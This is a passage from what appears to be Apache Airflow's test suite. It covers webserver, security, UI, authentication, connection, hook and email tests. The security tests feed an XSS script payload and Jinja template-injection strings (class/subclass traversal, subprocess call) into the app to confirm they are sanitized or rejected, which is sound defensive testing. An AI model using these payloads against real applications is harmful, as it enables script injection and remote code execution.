self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Run webserver in background.
subprocess.Popen(["airflow", "webserver", "-D"])
pidfile = cli.setup_locations("webserver")[0]
self._wait_pidfile(pidfile)
# Assert that gunicorn and its monitor are launched.
self.assertEqual(0, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(0, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Terminate monitor process.
pidfile = cli.setup_locations("webserver-monitor")[0]
pid = self._wait_pidfile(pidfile)
p = psutil.Process(pid)
p.terminate()
p.wait()
# Assert that no process remains.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
class SecurityTests(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
configuration.conf.set("webserver", "expose_config", "True")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
self.dagbag = models.DagBag(
dag_folder=DEV_NULL, include_examples=True)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
def get_csrf(self, response):
tree = html.fromstring(response.data)
form = tree.find('.//form')
return form.find('.//input[@name="_csrf_token"]').value
def test_csrf_rejection(self):
endpoints = ([
"/admin/queryview/",
"/admin/airflow/paused?dag_id=example_python_operator&is_paused=false",
])
for endpoint in endpoints:
response = self.app.post(endpoint)
self.assertIn('CSRF token is missing', response.data.decode('utf-8'))
def test_csrf_acceptance(self):
response = self.app.get("/admin/queryview/")
csrf = self.get_csrf(response)
response = self.app.post("/admin/queryview/", data=dict(csrf_token=csrf))
self.assertEqual(200, response.status_code)
def test_xss(self):
try:
self.app.get("/admin/airflow/tree?dag_id=<script>alert(123456)</script>")
except:
# exception is expected here since dag doesnt exist
pass
response = self.app.get("/admin/log", follow_redirects=True)
self.assertIn(bleach.clean("<script>alert(123456)</script>"), response.data.decode('UTF-8'))
def test_chart_data_template(self):
"""Protect chart_data from being able to do RCE."""
session = settings.Session()
Chart = models.Chart
chart1 = Chart(
label='insecure_chart',
conn_id='airflow_db',
chart_type='bar',
sql="SELECT {{ ''.__class__.__mro__[1].__subclasses__() }}"
)
chart2 = Chart(
label="{{ ''.__class__.__mro__[1].__subclasses__() }}",
conn_id='airflow_db',
chart_type='bar',
sql="SELECT 1"
)
chart3 = Chart(
label="{{ subprocess.check_output('ls') }}",
conn_id='airflow_db',
chart_type='bar',
sql="SELECT 1"
)
session.add(chart1)
session.add(chart2)
session.add(chart3)
session.commit()
chart1_id = session.query(Chart).filter(Chart.label=='insecure_chart').first().id
with self.assertRaises(SecurityError):
response = self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart1_id))
chart2_id = session.query(Chart).filter(Chart.label=="{{ ''.__class__.__mro__[1].__subclasses__() }}").first().id
with self.assertRaises(SecurityError):
response = self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart2_id))
chart3_id = session.query(Chart).filter(Chart.label=="{{ subprocess.check_output('ls') }}").first().id
with self.assertRaises(UndefinedError):
response = self.app.get("/admin/airflow/chart_data?chart_id={}".format(chart3_id))
def tearDown(self):
configuration.conf.set("webserver", "expose_config", "False")
self.dag_bash.clear(start_date=DEFAULT_DATE, end_date=timezone.utcnow())
class WebUiTests(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
configuration.conf.set("webserver", "expose_config", "True")
app = application.create_app()
app.config['TESTING'] = True
app.config['WTF_CSRF_METHODS'] = []
self.app = app.test_client()
self.dagbag = models.DagBag(include_examples=True)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.dag_bash2 = self.dagbag.dags['test_example_bash_operator']
self.sub_dag = self.dagbag.dags['example_subdag_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
self.example_xcom = self.dagbag.dags['example_xcom']
self.dagrun_bash2 = self.dag_bash2.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
self.sub_dag.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
self.example_xcom.create_dagrun(
run_id="test_{}".format(models.DagRun.id_for_date(timezone.utcnow())),
execution_date=DEFAULT_DATE,
start_date=timezone.utcnow(),
state=State.RUNNING
)
def test_index(self):
response = self.app.get('/', follow_redirects=True)
resp_html = response.data.decode('utf-8')
self.assertIn("DAGs", resp_html)
self.assertIn("example_bash_operator", resp_html)
# The HTML should contain data for the last-run. A link to the specific run, and the text of
# the date.
url = "/admin/airflow/graph?" + urlencode({
"dag_id": self.dag_bash2.dag_id,
"execution_date": self.dagrun_bash2.execution_date,
}).replace("&", "&")
self.assertIn(url, resp_html)
self.assertIn(self.dagrun_bash2.execution_date.strftime("%Y-%m-%d %H:%M"), resp_html)
def test_query(self):
response = self.app.get('/admin/queryview/')
self.assertIn("Ad Hoc Query", response.data.decode('utf-8'))
response = self.app.post(
"/admin/queryview/", data=dict(
conn_id="airflow_db",
sql="SELECT+COUNT%281%29+as+TEST+FROM+task_instance"))
self.assertIn("TEST", response.data.decode('utf-8'))
def test_health(self):
response = self.app.get('/health')
self.assertIn('The server is healthy!', response.data.decode('utf-8'))
def test_noaccess(self):
response = self.app.get('/admin/airflow/noaccess')
self.assertIn("You don't seem to have access.", response.data.decode('utf-8'))
def test_pickle_info(self):
response = self.app.get('/admin/airflow/pickle_info')
self.assertIn('{', response.data.decode('utf-8'))
def test_dag_views(self):
response = self.app.get(
'/admin/airflow/graph?dag_id=example_bash_operator')
self.assertIn("runme_0", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/tree?num_runs=25&dag_id=example_bash_operator')
self.assertIn("runme_0", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/duration?days=30&dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/tries?days=30&dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/landing_times?'
'days=30&dag_id=test_example_bash_operator')
self.assertIn("test_example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/landing_times?'
'days=30&dag_id=example_xcom')
self.assertIn("example_xcom", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/gantt?dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/code?dag_id=example_bash_operator')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/blocked')
response = self.app.get(
'/admin/configurationview/')
self.assertIn("Airflow Configuration", response.data.decode('utf-8'))
self.assertIn("Running Configuration", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/rendered?'
'task_id=runme_1&dag_id=example_bash_operator&'
'execution_date={}'.format(DEFAULT_DATE_ISO))
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/log?task_id=run_this_last&'
'dag_id=example_bash_operator&execution_date={}'
''.format(DEFAULT_DATE_ISO))
self.assertIn("run_this_last", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/task?'
'task_id=runme_0&dag_id=example_bash_operator&'
'execution_date={}'.format(DEFAULT_DATE_DS))
self.assertIn("Attributes", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/dag_stats')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/task_stats')
self.assertIn("example_bash_operator", response.data.decode('utf-8'))
url = (
"/admin/airflow/success?task_id=run_this_last&"
"dag_id=test_example_bash_operator&upstream=false&downstream=false&"
"future=false&past=false&execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
response = self.app.get(url + "&confirmed=true")
response = self.app.get(
'/admin/airflow/clear?task_id=run_this_last&'
'dag_id=test_example_bash_operator&future=true&past=false&'
'upstream=true&downstream=false&'
'execution_date={}&'
'origin=/admin'.format(DEFAULT_DATE_DS))
self.assertIn("Wait a minute", response.data.decode('utf-8'))
url = (
"/admin/airflow/success?task_id=section-1&"
"dag_id=example_subdag_operator&upstream=true&downstream=true&"
"future=false&past=false&execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
self.assertIn("section-1-task-1", response.data.decode('utf-8'))
self.assertIn("section-1-task-2", response.data.decode('utf-8'))
self.assertIn("section-1-task-3", response.data.decode('utf-8'))
self.assertIn("section-1-task-4", response.data.decode('utf-8'))
self.assertIn("section-1-task-5", response.data.decode('utf-8'))
response = self.app.get(url + "&confirmed=true")
url = (
"/admin/airflow/clear?task_id=runme_1&"
"dag_id=test_example_bash_operator&future=false&past=false&"
"upstream=false&downstream=true&"
"execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("Wait a minute", response.data.decode('utf-8'))
response = self.app.get(url + "&confirmed=true")
url = (
"/admin/airflow/run?task_id=runme_0&"
"dag_id=example_bash_operator&ignore_all_deps=false&ignore_ti_state=true&"
"ignore_task_deps=true&execution_date={}&"
"origin=/admin".format(DEFAULT_DATE_DS))
response = self.app.get(url)
response = self.app.get(
"/admin/airflow/refresh?dag_id=example_bash_operator")
response = self.app.get("/admin/airflow/refresh_all")
response = self.app.post(
"/admin/airflow/paused?"
"dag_id=example_python_operator&is_paused=false")
self.assertIn("OK", response.data.decode('utf-8'))
response = self.app.get("/admin/xcom", follow_redirects=True)
self.assertIn("Xcoms", response.data.decode('utf-8'))
def test_charts(self):
session = Session()
chart_label = "Airflow task instance by type"
chart = session.query(
models.Chart).filter(models.Chart.label == chart_label).first()
chart_id = chart.id
session.close()
response = self.app.get(
'/admin/airflow/chart'
'?chart_id={}&iteration_no=1'.format(chart_id))
self.assertIn("Airflow task instance by type", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/chart_data'
'?chart_id={}&iteration_no=1'.format(chart_id))
self.assertIn("example", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/dag_details?dag_id=example_branch_operator')
self.assertIn("run_this_first", response.data.decode('utf-8'))
def test_fetch_task_instance(self):
url = (
"/admin/airflow/object/task_instances?"
"dag_id=test_example_bash_operator&"
"execution_date={}".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("run_this_last", response.data.decode('utf-8'))
def tearDown(self):
configuration.conf.set("webserver", "expose_config", "False")
self.dag_bash.clear(start_date=DEFAULT_DATE, end_date=timezone.utcnow())
session = Session()
session.query(models.DagRun).delete()
session.query(models.TaskInstance).delete()
session.commit()
session.close()
class WebPasswordAuthTest(unittest.TestCase):
def setUp(self):
configuration.conf.set("webserver", "authenticate", "True")
configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.password_auth")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
from airflow.contrib.auth.backends.password_auth import PasswordUser
session = Session()
user = models.User()
password_user = PasswordUser(user)
password_user.username = 'airflow_passwordauth'
password_user.password = 'password'
print(password_user._password)
session.add(password_user)
session.commit()
session.close()
def get_csrf(self, response):
tree = html.fromstring(response.data)
form = tree.find('.//form')
return form.find('.//input[@name="_csrf_token"]').value
def login(self, username, password):
response = self.app.get('/admin/airflow/login')
csrf_token = self.get_csrf(response)
return self.app.post('/admin/airflow/login', data=dict(
username=username,
password=password,
csrf_token=csrf_token
), follow_redirects=True)
def logout(self):
return self.app.get('/admin/airflow/logout', follow_redirects=True)
def test_login_logout_password_auth(self):
self.assertTrue(configuration.getboolean('webserver', 'authenticate'))
response = self.login('user1', 'whatever')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('airflow_passwordauth', 'wrongpassword')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('airflow_passwordauth', 'password')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.logout()
self.assertIn('form-signin', response.data.decode('utf-8'))
def test_unauthorized_password_auth(self):
response = self.app.get("/admin/airflow/landing_times")
self.assertEqual(response.status_code, 302)
def tearDown(self):
configuration.load_test_config()
session = Session()
session.query(models.User).delete()
session.commit()
session.close()
configuration.conf.set("webserver", "authenticate", "False")
class WebLdapAuthTest(unittest.TestCase):
def setUp(self):
configuration.conf.set("webserver", "authenticate", "True")
configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.ldap_auth")
try:
configuration.conf.add_section("ldap")
except:
pass
configuration.conf.set("ldap", "uri", "ldap://localhost:3890")
configuration.conf.set("ldap", "user_filter", "objectClass=*")
configuration.conf.set("ldap", "user_name_attr", "uid")
configuration.conf.set("ldap", "bind_user", "cn=Manager,dc=example,dc=com")
configuration.conf.set("ldap", "bind_password", "insecure")
configuration.conf.set("ldap", "basedn", "dc=example,dc=com")
configuration.conf.set("ldap", "cacert", "")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
def get_csrf(self, response):
tree = html.fromstring(response.data)
form = tree.find('.//form')
return form.find('.//input[@name="_csrf_token"]').value
def login(self, username, password):
response = self.app.get('/admin/airflow/login')
csrf_token = self.get_csrf(response)
return self.app.post('/admin/airflow/login', data=dict(
username=username,
password=password,
csrf_token=csrf_token
), follow_redirects=True)
def logout(self):
return self.app.get('/admin/airflow/logout', follow_redirects=True)
def test_login_logout_ldap(self):
self.assertTrue(configuration.getboolean('webserver', 'authenticate'))
response = self.login('user1', 'userx')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('userz', 'user1')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('user1', 'user1')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.logout()
self.assertIn('form-signin', response.data.decode('utf-8'))
def test_unauthorized(self):
response = self.app.get("/admin/airflow/landing_times")
self.assertEqual(response.status_code, 302)
def test_no_filter(self):
response = self.login('user1', 'user1')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
self.assertIn('Connections', response.data.decode('utf-8'))
def test_with_filters(self):
configuration.conf.set('ldap', 'superuser_filter',
'description=superuser')
configuration.conf.set('ldap', 'data_profiler_filter',
'description=dataprofiler')
response = self.login('dataprofiler', 'dataprofiler')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.login('superuser', 'superuser')
self.assertIn('Connections', response.data.decode('utf-8'))
def tearDown(self):
configuration.load_test_config()
session = Session()
session.query(models.User).delete()
session.commit()
session.close()
configuration.conf.set("webserver", "authenticate", "False")
class LdapGroupTest(unittest.TestCase):
def setUp(self):
configuration.conf.set("webserver", "authenticate", "True")
configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.ldap_auth")
try:
configuration.conf.add_section("ldap")
except:
pass
configuration.conf.set("ldap", "uri", "ldap://localhost:3890")
configuration.conf.set("ldap", "user_filter", "objectClass=*")
configuration.conf.set("ldap", "user_name_attr", "uid")
configuration.conf.set("ldap", "bind_user", "cn=Manager,dc=example,dc=com")
configuration.conf.set("ldap", "bind_password", "insecure")
configuration.conf.set("ldap", "basedn", "dc=example,dc=com")
configuration.conf.set("ldap", "cacert", "")
def test_group_belonging(self):
from airflow.contrib.auth.backends.ldap_auth import LdapUser
users = {"user1": ["group1", "group3"],
"user2": ["group2"]
}
for user in users:
mu = models.User(username=user,
is_superuser=False)
auth = LdapUser(mu)
self.assertEqual(set(users[user]), set(auth.ldap_groups))
def tearDown(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
class FakeSession(object):
def __init__(self):
from requests import Response
self.response = Response()
self.response.status_code = 200
self.response._content = 'airbnb/airflow'.encode('ascii', 'ignore')
def send(self, request, **kwargs):
return self.response
def prepare_request(self, request):
if 'date' in request.params:
self.response._content += (
'/' + request.params['date']).encode('ascii', 'ignore')
return self.response
class HttpOpSensorTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
args = {'owner': 'airflow', 'start_date': DEFAULT_DATE_ISO}
dag = DAG(TEST_DAG_ID, default_args=args)
self.dag = dag
@mock.patch('requests.Session', FakeSession)
def test_get(self):
t = SimpleHttpOperator(
task_id='get_op',
method='GET',
endpoint='/search',
data={"client": "ubuntu", "q": "airflow"},
headers={},
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
@mock.patch('requests.Session', FakeSession)
def test_get_response_check(self):
t = SimpleHttpOperator(
task_id='get_op',
method='GET',
endpoint='/search',
data={"client": "ubuntu", "q": "airflow"},
response_check=lambda response: ("airbnb/airflow" in response.text),
headers={},
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
@mock.patch('requests.Session', FakeSession)
def test_sensor(self):
sensor = sensors.HttpSensor(
task_id='http_sensor_check',
http_conn_id='http_default',
endpoint='/search',
request_params={"client": "ubuntu", "q": "airflow", 'date': '{{ds}}'},
headers={},
response_check=lambda response: (
"airbnb/airflow/" + DEFAULT_DATE.strftime('%Y-%m-%d')
in response.text),
poke_interval=5,
timeout=15,
dag=self.dag)
sensor.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
class FakeWebHDFSHook(object):
def __init__(self, conn_id):
self.conn_id = conn_id
def get_conn(self):
return self.conn_id
def check_for_path(self, hdfs_path):
return hdfs_path
class FakeSnakeBiteClientException(Exception):
pass
class FakeSnakeBiteClient(object):
def __init__(self):
self.started = True
def ls(self, path, include_toplevel=False):
"""
the fake snakebite client
:param path: the array of path to test
:param include_toplevel: to return the toplevel directory info
:return: a list for path for the matching queries
"""
if path[0] == '/datadirectory/empty_directory' and not include_toplevel:
return []
elif path[0] == '/datadirectory/datafile':
return [{'group': u'supergroup', 'permission': 420, 'file_type': 'f', 'access_time': 1481122343796,
'block_replication': 3, 'modification_time': 1481122343862, 'length': 0, 'blocksize': 134217728,
'owner': u'hdfs', 'path': '/datadirectory/datafile'}]
elif path[0] == '/datadirectory/empty_directory' and include_toplevel:
return [
{'group': u'supergroup', 'permission': 493, 'file_type': 'd', 'access_time': 0, 'block_replication': 0,
'modification_time': 1481132141540, 'length': 0, 'blocksize': 0, 'owner': u'hdfs',
'path': '/datadirectory/empty_directory'}]
elif path[0] == '/datadirectory/not_empty_directory' and include_toplevel:
return [
{'group': u'supergroup', 'permission': 493, 'file_type': 'd', 'access_time': 0, 'block_replication': 0,
'modification_time': 1481132141540, 'length': 0, 'blocksize': 0, 'owner': u'hdfs',
'path': '/datadirectory/empty_directory'},
{'group': u'supergroup', 'permission': 420, 'file_type': 'f', 'access_time': 1481122343796,
'block_replication': 3, 'modification_time': 1481122343862, 'length': 0, 'blocksize': 134217728,
'owner': u'hdfs', 'path': '/datadirectory/not_empty_directory/test_file'}]
elif path[0] == '/datadirectory/not_empty_directory':
return [{'group': u'supergroup', 'permission': 420, 'file_type': 'f', 'access_time': 1481122343796,
'block_replication': 3, 'modification_time': 1481122343862, 'length': 0, 'blocksize': 134217728,
'owner': u'hdfs', 'path': '/datadirectory/not_empty_directory/test_file'}]
elif path[0] == '/datadirectory/not_existing_file_or_directory':
raise FakeSnakeBiteClientException
elif path[0] == '/datadirectory/regex_dir':
return [{'group': u'supergroup', 'permission': 420, 'file_type': 'f', 'access_time': 1481122343796,
'block_replication': 3, 'modification_time': 1481122343862, 'length': 12582912, 'blocksize': 134217728,
'owner': u'hdfs', 'path': '/datadirectory/regex_dir/test1file'},
{'group': u'supergroup', 'permission': 420, 'file_type': 'f', 'access_time': 1481122343796,
'block_replication': 3, 'modification_time': 1481122343862, 'length': 12582912, 'blocksize': 134217728,
'owner': u'hdfs', 'path': '/datadirectory/regex_dir/test2file'},
{'group': u'supergroup', 'permission': 420, 'file_type': 'f', 'access_time': 1481122343796,
'block_replication': 3, 'modification_time': 1481122343862, 'length': 12582912, 'blocksize': 134217728,
'owner': u'hdfs', 'path': '/datadirectory/regex_dir/test3file'},
{'group': u'supergroup', 'permission': 420, 'file_type': 'f', 'access_time': 1481122343796,
'block_replication': 3, 'modification_time': 1481122343862, 'length': 12582912, 'blocksize': 134217728,
'owner': u'hdfs', 'path': '/datadirectory/regex_dir/copying_file_1.txt._COPYING_'},
{'group': u'supergroup', 'permission': 420, 'file_type': 'f', 'access_time': 1481122343796,
'block_replication': 3, 'modification_time': 1481122343862, 'length': 12582912, 'blocksize': 134217728,
'owner': u'hdfs', 'path': '/datadirectory/regex_dir/copying_file_3.txt.sftp'}
]
else:
raise FakeSnakeBiteClientException
class FakeHDFSHook(object):
def __init__(self, conn_id=None):
self.conn_id = conn_id
def get_conn(self):
client = FakeSnakeBiteClient()
return client
class ConnectionTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
utils.db.initdb()
os.environ['AIRFLOW_CONN_TEST_URI'] = (
'postgres://username:password@ec2.compute.com:5432/the_database')
os.environ['AIRFLOW_CONN_TEST_URI_NO_CREDS'] = (
'postgres://ec2.compute.com/the_database')
def tearDown(self):
env_vars = ['AIRFLOW_CONN_TEST_URI', 'AIRFLOW_CONN_AIRFLOW_DB']
for ev in env_vars:
if ev in os.environ:
del os.environ[ev]
def test_using_env_var(self):
c = SqliteHook.get_connection(conn_id='test_uri')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertEqual('username', c.login)
self.assertEqual('password', c.password)
self.assertEqual(5432, c.port)
def test_using_unix_socket_env_var(self):
c = SqliteHook.get_connection(conn_id='test_uri_no_creds')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertIsNone(c.login)
self.assertIsNone(c.password)
self.assertIsNone(c.port)
def test_param_setup(self):
c = models.Connection(conn_id='local_mysql', conn_type='mysql',
host='localhost', login='airflow',
password='airflow', schema='airflow')
self.assertEqual('localhost', c.host)
self.assertEqual('airflow', c.schema)
self.assertEqual('airflow', c.login)
self.assertEqual('airflow', c.password)
self.assertIsNone(c.port)
def test_env_var_priority(self):
c = SqliteHook.get_connection(conn_id='airflow_db')
self.assertNotEqual('ec2.compute.com', c.host)
os.environ['AIRFLOW_CONN_AIRFLOW_DB'] = \
'postgres://username:password@ec2.compute.com:5432/the_database'
c = SqliteHook.get_connection(conn_id='airflow_db')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertEqual('username', c.login)
self.assertEqual('password', c.password)
self.assertEqual(5432, c.port)
del os.environ['AIRFLOW_CONN_AIRFLOW_DB']
def test_dbapi_get_uri(self):
conn = BaseHook.get_connection(conn_id='test_uri')
hook = conn.get_hook()
self.assertEqual('postgres://username:password@ec2.compute.com:5432/the_database', hook.get_uri())
conn2 = BaseHook.get_connection(conn_id='test_uri_no_creds')
hook2 = conn2.get_hook()
self.assertEqual('postgres://ec2.compute.com/the_database', hook2.get_uri())
def test_dbapi_get_sqlalchemy_engine(self):
conn = BaseHook.get_connection(conn_id='test_uri')
hook = conn.get_hook()
engine = hook.get_sqlalchemy_engine()
self.assertIsInstance(engine, sqlalchemy.engine.Engine)
self.assertEqual('postgres://username:password@ec2.compute.com:5432/the_database', str(engine.url))
def test_get_connections_env_var(self):
conns = SqliteHook.get_connections(conn_id='test_uri')
assert len(conns) == 1
assert conns[0].host == 'ec2.compute.com'
assert conns[0].schema == 'the_database'
assert conns[0].login == 'username'
assert conns[0].password == 'password'
assert conns[0].port == 5432
def test_get_connections_db(self):
conns = BaseHook.get_connections(conn_id='airflow_db')
assert len(conns) == 1
assert conns[0].host == 'localhost'
assert conns[0].schema == 'airflow'
assert conns[0].login == 'root'
class WebHDFSHookTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
def test_simple_init(self):
from airflow.hooks.webhdfs_hook import WebHDFSHook
c = WebHDFSHook()
self.assertIsNone(c.proxy_user)
def test_init_proxy_user(self):
from airflow.hooks.webhdfs_hook import WebHDFSHook
c = WebHDFSHook(proxy_user='someone')
self.assertEqual('someone', c.proxy_user)
try:
from airflow.hooks.hdfs_hook import HDFSHook
import snakebite
except ImportError:
HDFSHook = None
@unittest.skipIf(HDFSHook is None,
"Skipping test because HDFSHook is not installed")
class HDFSHookTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
os.environ['AIRFLOW_CONN_HDFS_DEFAULT'] = ('hdfs://localhost:8020')
def test_get_client(self):
client = HDFSHook(proxy_user='foo').get_conn()
self.assertIsInstance(client, snakebite.client.Client)
self.assertEqual('localhost', client.host)
self.assertEqual(8020, client.port)
self.assertEqual('foo', client.service.channel.effective_user)
@mock.patch('airflow.hooks.hdfs_hook.AutoConfigClient')
@mock.patch('airflow.hooks.hdfs_hook.HDFSHook.get_connections')
def test_get_autoconfig_client(self, mock_get_connections,
MockAutoConfigClient):
c = models.Connection(conn_id='hdfs', conn_type='hdfs',
host='localhost', port=8020, login='foo',
extra=json.dumps({'autoconfig': True}))
mock_get_connections.return_value = [c]
HDFSHook(hdfs_conn_id='hdfs').get_conn()
MockAutoConfigClient.assert_called_once_with(effective_user='foo',
use_sasl=False)
@mock.patch('airflow.hooks.hdfs_hook.AutoConfigClient')
def test_get_autoconfig_client_no_conn(self, MockAutoConfigClient):
HDFSHook(hdfs_conn_id='hdfs_missing', autoconfig=True).get_conn()
MockAutoConfigClient.assert_called_once_with(effective_user=None,
use_sasl=False)
@mock.patch('airflow.hooks.hdfs_hook.HDFSHook.get_connections')
def test_get_ha_client(self, mock_get_connections):
c1 = models.Connection(conn_id='hdfs_default', conn_type='hdfs',
host='localhost', port=8020)
c2 = models.Connection(conn_id='hdfs_default', conn_type='hdfs',
host='localhost2', port=8020)
mock_get_connections.return_value = [c1, c2]
client = HDFSHook().get_conn()
self.assertIsInstance(client, snakebite.client.HAClient)
try:
from airflow.hooks.http_hook import HttpHook
except ImportError:
HttpHook = None
@unittest.skipIf(HttpHook is None,
"Skipping test because HttpHook is not installed")
class HttpHookTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
@mock.patch('airflow.hooks.http_hook.HttpHook.get_connection')
def test_http_connection(self, mock_get_connection):
c = models.Connection(conn_id='http_default', conn_type='http',
host='localhost', schema='http')
mock_get_connection.return_value = c
hook = HttpHook()
hook.get_conn({})
self.assertEqual(hook.base_url, 'http://localhost')
@mock.patch('airflow.hooks.http_hook.HttpHook.get_connection')
def test_https_connection(self, mock_get_connection):
c = models.Connection(conn_id='http_default', conn_type='http',
host='localhost', schema='https')
mock_get_connection.return_value = c
hook = HttpHook()
hook.get_conn({})
self.assertEqual(hook.base_url, 'https://localhost')
@mock.patch('airflow.hooks.http_hook.HttpHook.get_connection')
def test_host_encoded_http_connection(self, mock_get_connection):
c = models.Connection(conn_id='http_default', conn_type='http',
host='http://localhost')
mock_get_connection.return_value = c
hook = HttpHook()
hook.get_conn({})
self.assertEqual(hook.base_url, 'http://localhost')
@mock.patch('airflow.hooks.http_hook.HttpHook.get_connection')
def test_host_encoded_https_connection(self, mock_get_connection):
c = models.Connection(conn_id='http_default', conn_type='http',
host='https://localhost')
mock_get_connection.return_value = c
hook = HttpHook()
hook.get_conn({})
self.assertEqual(hook.base_url, 'https://localhost')
send_email_test = mock.Mock()
class EmailTest(unittest.TestCase):
def setUp(self):
configuration.remove_option('email', 'EMAIL_BACKEND')
@mock.patch('airflow.utils.email.send_email')
def test_default_backend(self, mock_send_email):
res = utils.email.send_email('to', 'subject', 'content')
mock_send_email.assert_called_with('to', 'subject', 'content')
self.assertEqual(mock_send_email.return_value, res)
@mock.patch('airflow.utils.email.send_email_smtp')
def test_custom_backend(self, mock_send_email):
configuration.set('email', 'EMAIL_BACKEND', 'tests.core.send_email_test')
utils.email.send_email('to', 'subject', 'content')
send_email_test.assert_called_with('to', 'subject', 'content', files=None, dryrun=False, cc=None, bcc=None, mime_subtype='mixed')
self.assertFalse(mock_send_email.called)
class EmailSmtpTest(unittest.TestCase):
def setUp(self):
configuration.set('smtp', 'SMTP_SSL', 'False')
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_smtp(self, mock_send_mime):
attachment = tempfile.NamedTemporaryFile()
attachment.write(b'attachment')
attachment.seek(0)
utils.email.send_email_smtp('to', 'subject', 'content', files=[attachment.name])
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
self.assertEqual(configuration.get('smtp', 'SMTP_MAIL_FROM'), call_args[0])
self.assertEqual(['to'], call_args[1])
msg = call_args[2]
self.assertEqual('subject', msg['Subject'])
self.assertEqual(configuration.get('smtp', 'SMTP_MAIL_FROM'), msg['From'])
self.assertEqual(2, len(msg.get_payload()))
self.assertEqual(u'attachment; filename="' + os.path.basename(attachment.name) + '"',
msg.get_payload()[-1].get(u'Content-Disposition'))
mimeapp = MIMEApplication('attachment')
self.assertEqual(mimeapp.get_payload(), msg.get_payload()[-1].get_payload())
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_bcc_smtp(self, mock_send_mime):
attachment = tempfile.NamedTemporaryFile()
attachment.write(b'attachment')
attachment.seek(0)
utils.email.send_email_smtp('to', 'subject', 'content', files=[attachment.name], cc='cc', bcc='bcc')
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
self.assertEqual(configuration.get('smtp', 'SMTP_MAIL_FROM'), call_args[0])
self.assertEqual(['to', 'cc', 'bcc'], call_args[1])
msg = call_args[2]
self.assertEqual('subject', msg['Subject'])
